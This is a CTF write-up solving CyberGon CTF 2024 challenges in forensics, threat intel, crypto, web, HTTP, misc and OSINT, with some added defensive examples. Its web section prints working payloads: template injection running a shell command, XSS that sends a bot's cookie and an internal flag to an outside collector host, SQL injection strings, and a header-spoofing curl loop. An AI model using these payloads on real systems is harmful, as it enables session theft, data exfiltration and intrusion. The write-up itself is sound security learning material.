
CyberGon_CTF2024 Writeup by Team Cyborg

The document outlines the participation and contributions of team members in the CyberGon CTF 2024 competition, detailing various challenges in categories such as Forensics, TI, Crypto, and more. Each challenge includes specific tasks, flag formats, and answers derived from registry paths, Facebook searches, and malware analysis. The document serves as a comprehensive record of the team's problem-solving process and the flags obtained during the competition.

Uploaded by

Ye Zeiya Shein

CYBERGON_CTF2024

CYBORG

Participated Team Members

- Thurein Oo
- Htet Wai Phyo
- Wai Yan Kyaw

Contents
Forensics
TI
Crypto
WEB
HTTP
MISC
Osint
Stegano
Reconnaissance
Bonus

Forensics
Warm Up
Timezone
What is the timezone of the device?
Flag Format - CYBERGON_CTF2024{UTC-01:00 La Paz, Mazatlan}
Author - Andro6
I dumped the registry and viewed it with Registry Explorer.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation

The timezone is Singapore Standard Time, but to align with the flag format, I did some Google searching and found the answer.

CYBERGON_CTF2024{UTC+08:00 Kuala Lumpur, Singapore}

(1)
Welcome - 1
What are the device's name and the device owner's name?
Flag Format - CYBERGON_CTF2024{Device-Name, Owner Name}
Author - Andro6

In the following registry path, I found the device name.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
The following registry path revealed the registered owner name.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

CYBERGON_CTF2024{WHITE-PARTY, Sean John Combs}

(2)
Welcome - 2
What is the Facebook User ID and Bio status of device owner?
Flag Format - CYBERGON_CTF2024{12345678901234, Danger}
Author - Andro6

I searched for the device owner's name on Facebook and found multiple accounts. But one of them seemed suspicious to me, as it looked like a totally fake account and was somewhat related to the challenge creators.
CYBERGON_CTF2024{61567849079733, East Coast Rapper}

(3)
Welcome - 3
Do you know the device owner's nickname?
Flag Format - CYBERGON_CTF2024{Full Name}
Author - Andro6

Opening the image file in Autopsy revealed the requested information.


CYBERGON_CTF2024{Ko Toke Gyi}

(4)
Brower - 1
How many browsers are installed on the device, and which one was installed
last?
Flag Format - CYBERGON_CTF2024{1, Browser Name}
Author - Andro6

Found the following browsers in Program Files, Program Files (x86) and the user's AppData/Local, 11 in total, and RockMelt was installed last.
1. RockMelt
2. Maxthon
3. Mozilla
4. Brave
5. Vivaldi
6. Opera Software
7. UC
8. Google Chrome
9. Edge
10. IE
11. SeaMonkey

CYBERGON_CTF2024{11, RockMelt}

(5)
Brower - 2
What is the default browser, and when was it installed? (Time - UTC)
Flag Format - CYBERGON_CTF2024{Browser Name, 2024-01-01 01:01:01}
Author: Andro6

In the following registry path, I found the default browser was Maxthon.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

The properties of the Maxthon.exe file clearly showed me the installation date.


CYBERGON_CTF2024{Maxthon,2024-10-31 16:23:14}

(8)
The Location
After Halloween Party, what location is the device's owner exploring for some
fun? (The location - street/road name, city name, country)
Flag Format - CYBERGON_CTF2024{Stoneroller Street, New Market, United State}

I found the user's Facebook check-in and guessed it might be the answer.
CYBERGON_CTF2024{Khao San Road, Bangkok, Thailand}

(9)
Sleep Timeout

On battery power, PC goes to sleep after ______ ? When plugged in, PC goes to
sleep after ______?
Note: Answer with minutes
Flag Format - CYBERGON_CTF2024{1, 2}
Author - Andro6

In the following registry path, the sleep timeout was set as follows; I converted it into minutes and we got the flag.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20\29f6c1db-86da-48c5-9fdb-f2b67b1f44da

CYBERGON_CTF2024{300, 60}

(11)
Bonus

On his Facebook account, he followed some accounts, and one of the followed
accounts shared a post related to him. You need to find that post, as the
flag is there.

I found Lwan Eain Ko's shared post, and a quick check of the edit history gave me the flag.
CYBERGON_CTF2024{s0c14L_m3d1a_O51n7!!!!!}

Badboy
Badboy

What's the name of compromised user full name and what is the technique id
for the initial access ? If the user is Maung Yit, just use maungyit.
Filename - Badboy.zip
MD5 - 61B71104B3939C7613FFC46DAFA04C58
SHA1 - 6F78FFED8BE3A6F492B2593DCF705CBB10755A59
Link1 - https://tinyurl.com/msbk7dhd
Link2 - https://tinyurl.com/y42zr987
CYBERGON_CTF2024{compromiseduser_TechniqueID}
Author - iamkfromburma

Firstly, I tried the user testing, which was incorrect, and then the name contained in the email, emily, which was incorrect again. Suddenly I got the idea to view the browser history and found the username.
The technique is simple: QR code phishing, which is also called quishing.
CYBERGON_CTF2024{emilystones_T1566}

Badboy1
Badboy1

Which email service and method was used by the attacker to deliver malware ?
If the email service is Cybergon's Fake Service, just use cybergon. Use
short name for the attack (eg: phishing > phishing).
CYBERGON_CTF2024{emailservice_methodname}
Author - iamkfromburma

I opened "Update your latest version for free movie.eml" in the Sublime Text editor. The value after "Received:" is the email service.
CYBERGON_CTF2024{emkei.cz_quishing}

Badboy2
Badboy2

What's the original file name of malicious binary, SHA1 and which ip:port
was used to download ? If you found the file, do some research to find the
original name and provide filename with extension.
CYBERGON_CTF2024{filename.ext_SHA1_ip:port}
Author - iamkfromburma

Uploaded to VirusTotal and found the filename and hash.

When I scanned the QR code, I got a tinyurl link, which then gave me the download link.
"http://192.168.1.49:8080/MovieTheratre.exe"

https://www.virustotal.com/gui/file/fe321e33dd29bcc7dba51d40283cde9f3cb7bc50cb1b3674387f4dfbc93c7d18
CYBERGON_CTF2024{ab.exe_d87d087f87650f8ef030728160ec445160884c51_192.168.1.49:8080}

Badboy3
Badboy3

Attacker maintained access by creating a local account on the workstation.
Can you find the Security ID related to that account and which mitre sub
technique ID belongs to that situation ?
CYBERGON_CTF2024{Security ID_TechniqueID}
Author - iamkfromburma

In the Windows security events, I found an event in which the username looks suspicious. It might be the backdoor account created by the attacker.

CYBERGON_CTF2024{S-1-5-21-3207570911-3252757684-1389592363-1002_T1136.001}
TI
Stealer
Stealer

Most Mac infostealers leverage a well-known script to display error
messages, in addition to utilizing an open-source tool for password
collection. Can you identify the widely-used script, the corresponding MITRE
ATT&CK technique ID associated with this type of script usage, and the name
of the open-source tool ? (Abc script = abc, Def tool = def)
CYBERGON_CTF2024{script_MITREID_toolname}
Author - iamkfromburma

From the following blog post, I got the flag.
https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
https://thehackernews.com/2024/08/new-macos-malware-cthulhu-stealer.html
CYBERGON_CTF2024{osa_T1059_chainbreaker}

RDP
RDP

Midnight Blizzard launched a spear-phishing campaign to distribute malicious
RDP files. Are you familiar with the signature identified by Microsoft
Defender for this campaign ? Additionally, do you know the number of well-
known RDP files, number of the sender domain, and the APT designation
associated with Midnight Blizzard ?
CYBERGON_CTF2024{Signature_XX_XX_APTXX}
Author - iamkfromburm

The answers are in the following article.
https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
CYBERGON_CTF2024{Backdoor:Script/HustleCon.A_15_5_APT29}

Crypto
CRYPTO

DPRK has targeted cryptocurrency sectors using malicious macOS applications;
can you identify the responsible threat group, how many malware families
have been linked to it, and the functions used for persistence and C2
operations? Also reveal the associated Apple Developer ID.
CYBERGON_CTF2024{Name_totalnumberofmalwarefamiles_functionforpersistence_functionforC2_AppleDeveloper(ID)}
Author - iamkfromburma

You can see the related malware families in the following post.
https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html

And some other related information is in this link.
https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/
CYBERGON_CTF2024{BlueNoroff_5_sym.install_char__char__DoPost_Avantis Regtech Private Limited (2S8XHJ7948)}

Ransomware
Ransomware
This ransom is known as a rebrand of Royal ransom. Can you find the mutex
flag value, encryption technique and credentials theft tool name like
mimikatz ?
CYBERGON_CTF2024{Mutexvalue_Encryption Technique_DumpingTool}
Author - iamkfromburma

Found the necessary information in the following article.
https://unit42.paloaltonetworks.com/threat-assessment-blacksuit-ransomware-ignoble-scorpius/
CYBERGON_CTF2024{Global\WLm87eV1oNRx6P3E4Cy9_OpenSSL AES_NanoDump}
Crypto
RSA1
RSA 1
Try to get the plaintext from this encryption script.
Author - Andro6

We got the flag by running the following Python decryption script.


from Crypto.Util.number import getPrime, bytes_to_long
from math import gcd

flag = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
FLAG = flag.encode()

out = open('output.txt', 'w')

rsa_q = getPrime(512)
rsa_p = getPrime(512)
n = rsa_q * rsa_p
exp1 = 0x10003
exp2 = 0x10001

assert gcd(exp1, exp2) == 1


assert gcd(exp1, n) == 1
assert gcd(exp2, n) == 1

def encryption(plaintext):
    cip1 = pow(plaintext, exp1, n)
    cip2 = pow(plaintext, exp2, n)
    return (cip1, cip2)

cip1, cip2 = encryption(bytes_to_long(FLAG))

out.write("n = "+ str(n)+ "\ncip1 = "+ str(cip1)+ "\ncip2 = "+str(cip2))


out.close()


from Crypto.Util.number import long_to_bytes, inverse
from sympy import gcdex

# Given values
n = 157508528276758767638734754424621334466394815259243977959210580239577661657714722726225362774231543920376913579658052494826650164280151836289734452590647102313381584133512835595817708427222746495824286741840967127393187086028742577763080469063534742728547285121808241078515099307495843605080694383425986909029
cip1 = 69950256754119187070741220414057295159525964023691737870808579797990094306696842507546591858691032981385348052406246203530192324935867616305070637936848926878022662082401090988631324024964630729510728043900454511012552105883413265919300434674823577232105833994040714469215427142851489025266027204415434792116
cip2 = 26975575766224799967239054937673125413993489249748738598424368718984020839138611191333159231531582854571888911372230794559127658721738810364069579050102089465873134218196672846627352697187584137181503188003597560229078494880917705349140663228281705408967589237626894208542139123054938434957445017636202240137
e1 = 0x10003
e2 = 0x10001

# Bezout coefficients with a*e1 + b*e2 == 1
a, b, _ = gcdex(e1, e2)

# A negative exponent is applied by inverting that ciphertext modulo n
if a < 0:
    a = -a
    cip1 = inverse(cip1, n)
if b < 0:
    b = -b
    cip2 = inverse(cip2, n)
a = int(a)
b = int(b)

m = (pow(cip1, a, n) * pow(cip2, b, n)) % n

flag = long_to_bytes(m)
print(flag.decode())

CYBERGON_CTF2024{54m3_m0Du1u5!!!!!}
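
Why the decryption script works, as an added derivation that is not part of the original writeup (it uses the script's names e1, e2, cip1, cip2 as $e_1, e_2, c_1, c_2$): both ciphertexts encrypt the same message $m$ under the same modulus $n$, and $\gcd(e_1, e_2) = 1$, so the extended Euclidean algorithm yields integers $a, b$ with

$$a e_1 + b e_2 = 1 \quad\Longrightarrow\quad c_1^{a} \, c_2^{b} \equiv m^{a e_1} \, m^{b e_2} = m^{a e_1 + b e_2} = m \pmod{n}.$$

For $e_1 = 65539$ and $e_2 = 65537$ one such pair is $a = -32768$, $b = 32769$, since $32769 \cdot 65537 - 32768 \cdot 65539 = 1$. The negative exponent is evaluated as $(c_1^{-1})^{32768} \bmod n$, which is why the script inverts the ciphertext whenever a coefficient is negative. Neither the factors of $n$ nor a private exponent are needed, so one modulus must never be reused with two public exponents for the same plaintext.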
EasyPeasy
E45y p345y
Just decode it !!!
cipher - NR_UO_{43CrbGC4!c!K}CRT21Np_YEF0_3HrB2f3
Author - Andro6

CYBERGON_CTF2024{R4!1_f3Nc3_C!pH3r_KrUb}

Twice
Twice !!
Can you decode it?
Author - Andro6

CYBERGON_CTF2024{c!7R!h_C7x1_c1Ph3R_KrUb!!!}

I Love Poetry
I Love Poetry
I love poetry for the way each line and letter aligns so perfectly. Don't use
any space and put all together. CYBERGON_CTF2024{xxxxxxxxxxxxxxxxx}
Author - iamkfromburma

Decoding the last part revealed some information.


I selected the line:word as the result and got the flag.
CYBERGON_CTF2024{Haveyoueverheardthepoemcipher}

Warm Up
Warm Up
It's only a few steps .. Ready 1 2 3 !!! CYBERGON_CTF2024{xxx_xxx_xxxx}
Author - iamkfromburma

I found binary code in Warm Up.txt.

Then I converted the binary into an ASCII string and got the following hexadecimal values.
I then decoded these output values from Base92 encoding and got the flag.

CYBERGON_CTF2024{b45392_h3x_b1n4ry}

Warm Up - 1
You are already familiar with these ciphers. CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

I found Brainfuck-encoded cipher text and detected whitespace characters in the Warm Up 1 challenge file.
I got these flags for part1 and part2.
CYBERGON_CTF2024{br41nfuck_0r_wh1t35p4c3?}

Warm Up - 2
It looks like copy and paste. Yeah, better together.
CYBERGON_CTF2024{xxx_xxxx_xxx}

2mx2jp3qf3im4oz3vq1cg1ck6r569r19x4ok5os4ok4wg6d04qc6gh5ul

Author - iamkfromburma

After identifying the cipher, I found that this is the Twin Hex Cipher.

Then I got the flag.


CYBERGON_CTF2024{1t_15_4ll_4b0ut_tw1n}

Chill Bro
I always enjoy chilling by watching movies or series, and Arthur Conan Doyle
is one of my favorites. CYBERGON_CTF2024{XXXXXXXXXXXXXXX}

Author - iamkfromburma

I searched for this challenge photo with Google and found that the picture is in the dancing man cipher format.
Then I converted it into plain text with a dancing man decoder.

CYBERGON_CTF2024{TAKEABREAKBROLETSDANCE}
WEB
Trickery Number
Numbers are tricky, could you find the way to solve?
Flag Format: CYBERGON_CTF2024{xxx}
Author: mgthuramoemyint
http://46.250.232.141:3000/

I read the provided server.js file and noticed the following condition check. If I can satisfy this condition check, I can get the flag.

The length of y must be less than 17, and the value of BigInt(parseInt(y)) must be less than the original value of y. There is one trick: JavaScript translates "0b11111" from binary to the decimal value 31 in the comparison, but the parseInt function converts the string '0b11111' to the integer value 0. So if '0b11111' is used as the y value, the flag can be obtained.
Greeting
Can you send a proper greeting and take the flag.
Flag Format: CYBERGON_CTF2024{xxx}
Author: mgthuramoemyint

http://46.250.232.141:5000

I browsed to the target URL, and there is only one form, to enter a username. So I tested by injecting an HTML tag and some strings, and the response contained them. So I knew there might be XSS or SSTI. I tested with SSTI payloads. I tested with {{7*7}} and got the following output.

And I noticed that if my payloads contain (), the server returns the following message. () must be blacklisted. So I looked for a round-bracket bypass and found the following one. I used %EF%BC%88 as ( and %EF%BC%88 as ).
payload
%7B%7Bnamespace.__init__.__globals__.os.popen%EF%BC%88%22cat+flag.txt%22%EF%BC%89.read%EF%BC%88%EF%BC%89%7D%7D

Hidden One
Hidden One
Can you find the hidden one ? CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

This one makes me mad -_-. I tried to read all the source code but couldn't find the flag for this challenge. But if you try /flag.txt, you can get the flag.

DumbBot
DumbBot

The bot that was created by admin is stupid enough to view every link from users.
Can you abuse the bot and find the flag?
Flag Format: CYBERGON_CTF2024{xxx} Author:mgthuramoemyint

http://46.250.232.141:13579
At the /gallery endpoint, there is a src parameter. It has an XSS vulnerability, but our injected JavaScript code can't execute because there is a CSP policy that only allows JavaScript from https://www.google.com/recaptcha/ .
And I found a CSP bypass on HackTricks.

I used the following payload, and the bot will visit my crafted malicious endpoint and send the cookie value to my server. Please notice that I use %2b (URL-encoded value) for '+'.
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script><img src=x ng-on-error='doc=$event.target.ownerDocument;doc.defaultView.parent.location="https://sqmz35jd0ryxjqkrxwn3unzqahg84ysn.oastify.com/"%2bdoc.cookie;'>
We get the admin's cookie. If we access the admin portal with this cookie, we get a new hidden parameter. But I still got a 403 error when going to the flag-get endpoint. So I noticed one thing: the flag endpoint can only be accessed internally.
There is an XSS vulnerability in the admin portal via the h1dd3nparam-cyBerG0n parameter, and there is no CSP policy. So I used the following JavaScript code to force the bot to go to the flag endpoint and send the response of the flag endpoint back to my server.
/admin?h1dd3nparam-cyBerG0n=<script>fetch('http://web/flag', { credentials: 'include' }).then(r1 => r1.text()).then(flag => {fetch(`https://x97j9ws69o9xpbtgk000j02rnit9h0loa.oastify.com/${flag}`);})</script>

CYBERGON_CTF2024{Th3_DumB_dUmB_b0T!}

Agent
Agent

Agents can register and login, but can you figure out the flag?
Flag Format: CYBERGON_CTF2024{xxx}
Authors:mgthuramoemyint

http://46.250.232.141:8001/

I noticed that there is an SQL injection vulnerability in an INSERT query via the User-Agent header's value. I injected an SQL query in the User-Agent header of the login request, and I could check the injected query's result at logs.php.

So I extracted the database name, table names and column names. And I found the flag in the first row of the password column of the users table.
hello',(select concat(username,' === ', password, '%0a') from users limit 0,1))-- -

CYBERGON_CTF2024{N0w_Ag3nt_PwN3d_Th3_S3rv3r}
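
The INSERT injection through the User-Agent header described above, next to its parameterized fix, as an added example that is not the challenge's code. The schema, sample rows and function names are constructed, and SQLite's `||` operator stands in for MySQL's concat().

```python
import sqlite3

# Constructed payload with the same shape as the one in the writeup:
# it closes the first string, supplies a subquery as the second column
# value, closes the VALUES list and comments out the rest of the line.
PAYLOAD = ("hello',(select username || ' === ' || password "
           "from users limit 0,1))-- -")

# Constructed benign header that merely contains an apostrophe.
BENIGN_WITH_QUOTE = "Mozilla/5.0 (O'Brien build)"


def make_db():
    """In-memory stand-in for the application database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE logs  (user_agent TEXT, note TEXT);
        INSERT INTO users VALUES ('admin', 'constructed-secret');
        """
    )
    return db


def log_request_vulnerable(db, user_agent):
    """Header text is pasted into the statement, so it becomes SQL."""
    sql = ("INSERT INTO logs (user_agent, note) VALUES ('"
           + user_agent + "', 'login')")
    db.execute(sql)


def log_request_safe(db, user_agent):
    """Header text is bound as a parameter, so it stays data."""
    db.execute(
        "INSERT INTO logs (user_agent, note) VALUES (?, ?)",
        (user_agent, "login"),
    )


def read_logs(db):
    """What a log viewer such as logs.php would render."""
    return db.execute("SELECT user_agent, note FROM logs").fetchall()


def vulnerable_rejects(db, user_agent):
    """True when the concatenated statement fails to parse at all."""
    try:
        log_request_vulnerable(db, user_agent)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    log_request_vulnerable(db, PAYLOAD)
    print("vulnerable log row:", read_logs(db))

    db = make_db()
    log_request_safe(db, PAYLOAD)
    print("parameterized log row:", read_logs(db))

    print("benign header breaks vulnerable insert:",
          vulnerable_rejects(make_db(), BENIGN_WITH_QUOTE))
```

With the concatenated statement the second column of the log row holds the subquery result; with bound parameters the whole header is stored as one literal string. A benign header containing an apostrophe also makes the concatenated INSERT fail, which is a useful signal to look for in application error logs.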

Cybergon Blog
Cybergon Blog

We launched a blog where people can read updates from us.


Author: mgthuramoemyint Flag Format:CYBERGON_CTF2024{xxxx}

http://46.250.232.141:8081
When I analyzed the provided PHP file from the challenge, I noticed that at profile update I can upgrade my role from subscriber to contributor by adding the custom_option parameter as an array with value 0 to the profile update request.
custom_option[]=0
CYBERGON_CTF2024{w0rdpr3ss_vUlN_1s_FuN_4nd_3asy}

Event
Event

Can you find the hidden cybergon event and take the flag.
Flag Format: CYBERGON_CTF2024{xxx} Authors:mgthuramoemyint

http://46.250.232.141:5555/

I found an SQL error at search.php via the date parameter. So I tried to fix the SQL error and extract data from the database using SQL injection.
a'%2b'b'or'1'='1';--
%2b for + (string concatenation for SQL)
So I tried union-based SQL injection and extracted the table names and column names from the database.
a'%2b'b'and'1'='2'%0aunion%0aselect%0a1,group_concat(table_name,':::',column_name,'%0a'),3,4,5%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database();--
%0a for space bypass

I got the flag from the cybergon table, title column.

a'%2b'b'and'1'='2'%0aunion%0aselect%0a1,group_concat(title,'%0a'),3,4,5%0afrom%0acybergon;--
CYBERGON_CTF2024{SqL_1s_FuN_4nd_E@Sy}

Cybergon Blog 2
CybergonBlog2

Cybergon launched blog2 since blog1 is not that secure, they also have
confidential pages.
Flag Format: CYBERGON_CTF2024{xx} Author: mgthuramoemyint

http://46.250.232.141:8082/

I registered a new account on the blog, analyzed the provided PHP file, and found the generate_nonce and read_post_data functions. These functions use the is_admin() function, which can't validate the role of users. I know about the is_admin function from the following talk.
https://www.youtube.com/watch?v=BZCOehWZm4o
So a user with the normal subscriber role can generate a nonce to use with the read_post_data() function to read all posts, because that function didn't check post_status; it just checks the post_id and nonce value.
I got the flag from post_id value 5.

CYBERGON_CTF2024{W0rdPr3ss_1s_FuN_W4s_1t?}
HTTP
Protocol
Protocol

By making a proper request to this api endpoint [api.intelbyte.io], retrieve
the flag from its response.
Flag Format : CYBERGON_CTF2024{xxxxxxx}
Author : Too
Reminder: Use curl and wget exclusively

api.intelbyte.io

I got the flag with Content-Type: application/json

curl -X GET -H "Content-Type: application/json" https://api.intelbyte.io

CYBERGON_CTF2024{CybEr!-2024-G0n!-GeNt}

Trespasser
Trespasser

Access to the endpoint [backend.intelbyte.io] appears restricted, only
accepting requests through a particular source. Your challenge is to figure
out how to get a valid response.
Tip: curl/wget are your friend and consider that some well-known public DNS
servers might serve as intermediaries, however not the ones you're thinking
of.
Author : Too

backend.intelbyte.io

I generated a wordlist of public DNS server IPs with ChatGPT.



And I brute-forced the X-Forwarded-For header value in GET requests to backend.intelbyte.io.

for i in $(cat ips.txt); do curl -X GET -H "X-Forwarded-For: $i" https://backend.intelbyte.io; done

CYBERGON_CTF2024{3434-rvq34-5sdaf-ga4vw!}
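
One way a backend can derive the client address without believing a client-supplied X-Forwarded-For header, as an added example that is not the challenge's code. The proxy and allowed-client networks are constructed values, the function names are hypothetical, and the naive function is an assumption about how a header-only check behaves.

```python
import ipaddress

# Constructed values: the reverse proxies in front of the backend and the
# one upstream network the backend is meant to serve.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
ALLOWED_CLIENTS = [ipaddress.ip_network("203.0.113.0/24")]


def _in_any(addr, networks):
    return any(addr in net for net in networks)


def client_ip_naive(peer, headers):
    """Assumed weak behaviour: take the first X-Forwarded-For entry as fact."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer


def client_ip_strict(peer, headers):
    """Use the header only when the TCP peer is a trusted proxy.

    The chain is walked right to left, because each proxy appends the
    address it saw; the first hop that is not a trusted proxy is the
    client. Entries to the left of it were supplied by that client and
    carry no weight.
    """
    if not _in_any(ipaddress.ip_address(peer), TRUSTED_PROXIES):
        return peer                      # direct connection: ignore header
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")
            if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer                  # malformed entry: fall back to peer
        if not _in_any(addr, TRUSTED_PROXIES):
            return str(addr)
    return peer                          # header empty or proxies only


def is_allowed(ip):
    return _in_any(ipaddress.ip_address(ip), ALLOWED_CLIENTS)


if __name__ == "__main__":
    # Constructed requests: (TCP peer address, request headers)
    requests = [
        ("198.51.100.7", {"X-Forwarded-For": "203.0.113.5"}),
        ("10.0.0.2", {"X-Forwarded-For": "203.0.113.5"}),
        ("10.0.0.2", {"X-Forwarded-For": "203.0.113.5, 198.51.100.7"}),
    ]
    for peer, headers in requests:
        naive = client_ip_naive(peer, headers)
        strict = client_ip_strict(peer, headers)
        print(peer, headers, "naive:", is_allowed(naive),
              "strict:", is_allowed(strict))
```

Source-based access control is only as strong as the address it is computed from, so the strict variant should be paired with a proxy configuration that overwrites or appends the header itself.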
MISC
Rules
Rules

Did you read our CTF's rules ? Are the rules are same ? Flags are separated
by 3 different places.

CYBERGON_CTF2024{xxxx_xxxx_xxxxx}

Author - iamkfromburma

I found first part of flag at discord channel.

Second part from Rule page


Final part from cybergon blog

CYBERGON_CTF2024{d1sc0rd_p0rt4l_w3b}
Sponsors
Did you already check our sponsors ? If you watch carefully, you will see the entire flag.
CYBERGON_CTF2024{xxx_xxx_xxx}

Author - iamkfromburma

I got a YouTube link from the CTFtime CyberGon CTF event page.
https://www.youtube.com/watch?v=z_ijQc-GfLQ

And I got the flag from this YouTube video.


CYBERGON_CTF2024{h3llfir3_p4cific_gm4_alt3r_creatig0n}

Zip Zap
Zip Zap

Can you extract all the way to the end?

Author - Andro6

I extracted the provided zip file by using the following Python script.

import os
import subprocess

def extract_nested_zip_with_password(zip_path, output_dir):
    current_zip_path = zip_path

    for layer in range(1, 1000):  # Adjust max layers as needed
        try:
            # Create temporary directory to extract the current layer
            layer_output_dir = os.path.join(output_dir, f"layer_{layer}")
            os.makedirs(layer_output_dir, exist_ok=True)

            # List contents of the current zip file to get the inner file name
            result = subprocess.run(
                ['7z', 'l', current_zip_path],
                capture_output=True, text=True, check=True
            )

            # Extract the inner file name (assumes one file per ZIP layer)
            for line in result.stdout.splitlines():
                print(line)
                if "password" in line:  # Find the ZIP file
                    inner_file_name = line.split()[-1]
                    break
            else:
                # for-else: no listing line matched, so stop descending
                print(f"No inner ZIP file found in layer {layer}")
                break

            # Use the inner file name as the password
            print(inner_file_name)
            password = inner_file_name.split('-')[-1].split('.')[0].strip()

            # Extract the inner ZIP file
            subprocess.run(
                ['7z', 'x', f'-p{password}', current_zip_path, f'-o{layer_output_dir}'],
                check=True, stdout=subprocess.DEVNULL
            )

            # Update current_zip_path to point to the new inner zip file
            current_zip_path = os.path.join(layer_output_dir, inner_file_name)

        except subprocess.CalledProcessError as e:
            print(f"Extraction failed at layer {layer}: {e}")
            break

if __name__ == "__main__":
    # Define the path to the outermost zip file and output directory
    outer_zip = "500.zip"  # Replace with the actual file path
    output_directory = "extracted_files"

    # Create the output directory if it doesn't exist
    os.makedirs(output_directory, exist_ok=True)

    # Start the extraction process
    extract_nested_zip_with_password(outer_zip, output_directory)

And we got a fake flag at the lowest zip layer -_-. But we noticed that the password is something.

CYBERGON_CTF2024{y0U_g07_r341_F14g}

Triple Quiz
Triple Quiz

You’ll recognize it when you see it, it’s something you’ve already done
before.

CYBERGON_CTF2024{XXXXXXXXXXXXXXXXXXXXX}

Author - iamkfromburma

We got the Triple Quiz.wav file when extracting the provided rar file. But before extracting, we needed to crack the zip password file with rar2john and the rockyou wordlist.
Then we uploaded that .wav file to a Morse audio decoder and got a T9-encoded value.

Convert from T9 to text

CYBERGON_CTF2024{MORSEWITHTNINE}
Favorite Menu & Restaurant
Favorite Menu & Restaurant

Although I always play CTFs in the weekend, I don't have a chance to update
new upcoming event in my list. But, I only need cybergon's .. , they already
have one.There will be some password protected zip file. If you cannot crack,
you will need to find out the zip password (City_Country) that is belonged to
the stolen boat by using some osint. Please write menu and name like the
given format.

CYBERGON_CTF2024{Favorite Menu_Restaurant Name}.

Author - iamkfromburma

We accidentally found a Google Calendar link in the CyberGon official Discord channel (#ctf).
https://calendar.google.com/calendar/u/0/embed?src=c_2b3f2196ee1f41261f3f410969f8bce583926578d1acf25a1393799bf4b4fdab@group.calendar.google.com&ctz=Asia/Bangkok&fbclid=IwY2xjawExbuZleHRuA2FlbQIxMAABHUVBoorF8hFwRmFOUjRKwQ-rlBulQeoCEB44oyKi9vQ8Q6JUjkSoQeCgpw_aem_PgpJOof1UuoV0pq9CtGPDQ

When we opened the above calendar link, we found some hex values in the description.

We converted them from hex to a string and got the zip file download link.
https://tinyurl.com/bddetmxh
We searched for Boat.jpg with Google image search and found the boat model, "Oceanis 350", so we looked up this model on this website: https://stolenboats.info/en/theft/2856

We now know the city and country (La Rochelle_France), which is the password for Ghost Sound.zip.

When we extracted this zip file, we got the Ghost Sound.wav file. Analyzing this wav file with Sonic Visualiser gave the following three words.
We used these three words on the three words website to find something, and we found the following restaurant.

We searched for a favorite menu item from this restaurant and found that menu.
CYBERGON_CTF2024{Beef Soup_Heng Chun Seng}

Your Favorite Song


Do you know that is the best cover song?

password - What does the song name mean in English?

Author - Andro6

This challenge video file is about APT music. I used the binwalk tool to extract embedded data from the music video file.

Then I used apartment as the zip file password to extract the zip file. Then I got the flag from the metadata.txt file.
CYBERGON_CTF2024{Y0u_g07_r053}
Osint
The Flight
The Flight

The password you discovered in the Triple Quiz challenge (MISC category) is
the nickname of a footballer. His club recently appointed a new manager, and
the manager has recently traveled by flight. Can you track the details of
this flight?

CYBERGON_CTF2024{Departure City's IATA, Arrival City's IATA, ICAO Address}

Author - iamkfromburma

The password I discovered in the Triple Quiz challenge is iceman. So we searched for the iceman football player on Google and found the following Manchester United player.

Now we know the football team and the new manager, and we continued by finding the flight using the manager's name.
https://www.itv.com/news/granada/2024-11-11/thousands-track-new-united-managers-plane-as-he-makes-way-from-portugal

CYBERGON_CTF2024{BYJ,MAN,4950D2}

Favorite Journal
It's one of my favorite childhood journals. Can you find the published date
and the registration number of printing house for the volume 1 - number 1 ?

CYBERGON_CTF2024{X-X-XX_XXXX}

Author - iamkfromburma

This challenge is about the Shwe Thway journal, and we need to find its published date and the registration number of the printing house for volume 1 - number 1.
I found this data by searching in search engines.
CYBERGON_CTF2024{4-1-69-0032}

The Stadium
One of my colleagues loves to play hockey. He sent me this photo recently and
asked me where it is located, its capacity, and when it was built. (Please
remove "," for Capacity). The question is based on the stadium. So, target to
find the stadium's capacity and forget the keyword "hockey" at the
moment.

CYBERGON_CTF2024{City_Province_Capacity_BuiltYear}

Author - iamkfromburma

Searching Google for this image, I found the Centre Bell stadium. It is located in
Montreal, Quebec, Canada, and opened on March 16, 1996.
I then searched further for hockey stadiums in Canada and found the correct information
for this stadium.

CYBERGON_CTF2024{Montreal_Quebec_21105_1996}

The Statute
Can you locate the location of the person who took this photo ?

[Example - 01.01234 02.12345 = CYBERGON_CTF2024{01.0123_02.1234}]

Author - iamkfromburma

I found that this image shows the Maha Bodhi Ta Htaung Standing Buddha.


I then searched Google Maps with Street View and found the location of the person who
took this photo.

CYBERGON_CTF2024{22.0801555,95.2885383}

Vacation (1)
Can you find the location of this photo? To identify Hotel Name, City and
Country.

Flag Format - CYBERGON_CTF2024{Novotel Hotel, Bangkok, Thailand}

This photo is a view of Halong Park (Dragon Park) from a hotel, which is the Muong Thanh
Luxury Ha Long Centre Hotel.

